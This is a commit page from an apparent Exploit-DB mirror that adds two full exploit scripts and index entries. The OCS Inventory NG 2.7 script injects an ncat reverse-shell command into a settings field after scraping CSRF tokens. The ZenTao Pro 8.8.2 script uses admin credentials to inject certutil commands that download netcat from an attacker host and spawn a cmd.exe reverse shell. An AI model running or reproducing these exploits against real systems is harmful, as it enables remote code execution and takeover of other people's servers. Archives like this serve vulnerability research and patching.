bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-07-03

Browse source 
3 changes to exploits/shellcodes

WhatsApp Remote Code Execution - Paper
ZenTao Pro 8.8.2 - Command Injection
OCS Inventory NG 2.7 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-07-03 05:01:59 +00:00
parent 1e83e1b032
commit d6a1f63996
4 changed files with 227 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
exploits/android/webapps/48632.txt Normal file
View file

@ -0,0 +1 @@
1

119
exploits/multiple/webapps/48634.txt Normal file
View file

@ -0,0 +1,119 @@
# Exploit Title: OCS Inventory NG 2.7 - Remote Code Execution
# Date: 2020-06-05
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-14947
# Vendor Homepage: https://ocsinventory-ng.org/
# Version: v2.7
# Tested on: Ubuntu 18.04 / PHP 7.2.24
#!/usr/bin/python3
import requests
import sys
import warnings
import random
import string
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
if len(sys.argv) !=3D 6:
print("[~] Usage : ./ocsng-exploit.py url username password ip port")
exit()
url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]
request =3D requests.session()
def login():
login_info =3D {
"Valid_CNX": "Send",
"LOGIN": username,
"PASSWD": password
}
login_request =3D request.post(url+"/index.php", login_info)
login_text =3D login_request.text
if "User not registered" in login_text:
return False
else:
return True
def inject_payload():
csrf_req =3D request.get(url+"/index.php?function=3Dadmin_conf")
content =3D csrf_req.text
soup =3D BeautifulSoup(content, "lxml")
first_token =3D soup.find_all("input", id=3D"CSRF_10")[0].get("value")
print("[+] 1st token : %s" % first_token)
first_data =3D {
"CSRF_10": first_token,
"onglet": "SNMP",
"old_onglet": "INVENTORY"
}
req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=3Dfir=
st_data)
content2 =3D req.text
soup2 =3D BeautifulSoup(content2, "lxml")
second_token =3D soup2.find_all("input", id=3D"CSRF_14")[0].get("value"=
)
print("[+] 2nd token : %s" % second_token)
payload =3D "; ncat -e /bin/bash %s %s #" % (ip, port)
#RELOAD_CONF=3D&Valid=3DUpdate
inject_request =3D {
"CSRF_14": second_token,
"onglet": "SNMP",
"old_onglet": "SNMP",
"SNMP": "0",
"SNMP_INVENTORY_DIFF": "1",
# The payload should be here
"SNMP_MIB_DIRECTORY": payload,
"RELOAD_CONF": "",
"Valid": "Update"
}
final_req =3D request.post(url+"/index.php?function=3Dadmin_conf", data=
=3Dinject_request)
if "Update done" in final_req.text:
print("[+] Payload injected successfully")
execute_payload()
def execute_payload():
csrf_req =3D request.get(url+"/index.php?function=3DSNMP_config")
content =3D csrf_req.text
soup =3D BeautifulSoup(content, "lxml")
third_token =3D soup.find_all("input", id=3D"CSRF_22")[0].get("value")
third_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
files=3D{
'CSRF_22': (None, third_token),
'onglet': (None, 'SNMP_MIB'),
'old_onglet': (None, 'SNMP_RULE'),
'snmp_config_length': (None, '10')
})
print("[+] 3rd token : %s" % third_token)
third_request_text =3D third_request.text
soup =3D BeautifulSoup(third_request_text, "lxml")
forth_token =3D soup.find_all("input", id=3D"CSRF_26")[0].get("value")
print("[+] 4th token : %s" % forth_token)
print("[+] Triggering payload ..")
print("[+] Check your nc ;)")
forth_request =3D request.post(url+"/index.php?function=3DSNMP_config",=
files=3D{
'CSRF_26': (None, forth_token),
'onglet': (None, 'SNMP_MIB'),
'old_onglet': (None, 'SNMP_MIB'),
'update_snmp': (None, 'send')
})
if login():
print("[+] Valid credentials!")
inject_payload()

104
exploits/php/webapps/48633.py Executable file
View file

@ -0,0 +1,104 @@
# Exploit Title: ZenTao Pro 8.8.2 - Command Injection
# Date: 2020-07-01
# Exploit Author: Daniel Monzón & Melvin Boers
# Vendor Homepage: https://www.zentao.pm/
# Version: 8.8.2
# Tested on: Windows 10 / WampServer
# Other versions like pro or enterprise edition could be affected aswell
# Netcat is needed to use this exploit
import requests
import hashlib
import urllib.parse
host = 'http://192.168.223.132'
username = 'admin'
password = 'Test123!@#'
name = 'Test2'
command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26'
command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&'
git_path = 'C%3A%5CProgramData'
x = requests.session() # Create a session, as needed because we need admin rights.
def sign_in(url, username, password):
password = hashlib.md5(password.encode('utf-8')).hexdigest() # We need to md5 encode the password in order to sign in
proxy = {'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'} # Just for debugging phase
credentials = {'account' : username, 'password' : password} # The credentials we need
path = url + '/zentao/user-login.html' # URL + path
x.post(path, data=credentials, proxies=proxy, verify=False) # Send the post request to sign in
return '[*] We are signed in!'
def go_to_repo(url):
path = url + '/zentao/repo-browse.html'
x.get(path, verify=False)
print('[*] Getting to repo path')
def create_repo(url, name, command):
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin':'http://192.168.223.132',
'Referer':'http://192.168.223.132/pro/repo-create.html',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
'Accept-Language':'en-US,en;q=0.5'}
cookies = {'ajax_lastNext':'on',
'windowWidth':'1846',
'windowHeight':'790'}
path = url + '/zentao/repo-create.html'
parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command
x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
print('[*] Creating the repo')
def get_shell(url, name, command):
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin':'http://192.168.223.132',
'Referer':'http://192.168.223.132/pro/repo-create.html',
'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
'Accept-Language':'en-US,en;q=0.5'}
cookies = {'ajax_lastNext':'on',
'windowWidth':'1846',
'windowHeight':'790'}
path = url + '/zentao/repo-create.html'
parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2
x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)
print('[*] Check your netcat listener!')
def main():
switch = True
if switch:
sign_in(host, username, password)
if switch:
go_to_repo(host)
if switch:
create_repo(host, name, command)
if switch:
get_shell(host, name, command2)
switch = False
if __name__ == "__main__":
main()

3
files_exploits.csv
View file

@ -42887,3 +42887,6 @@ id,file,description,date,author,type,platform,port
48629,exploits/php/webapps/48629.txt,"e-learning Php Script 0.1.0 - 'search' SQL Injection",2020-07-01,KeopssGroup0day_Inc,webapps,php,
48630,exploits/php/webapps/48630.txt,"PHP-Fusion 9.03.60 - PHP Object Injection",2020-07-01,coiffeur,webapps,php,
48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,
48632,exploits/android/webapps/48632.txt,"WhatsApp Remote Code Execution - Paper",2020-07-02,"ashu Jaiswal",webapps,android,
48633,exploits/php/webapps/48633.py,"ZenTao Pro 8.8.2 - Command Injection",2020-07-02,"Daniel Monzón",webapps,php,
48634,exploits/multiple/webapps/48634.txt,"OCS Inventory NG 2.7 - Remote Code Execution",2020-07-02,Askar,webapps,multiple,

Can't render this file because it is too large.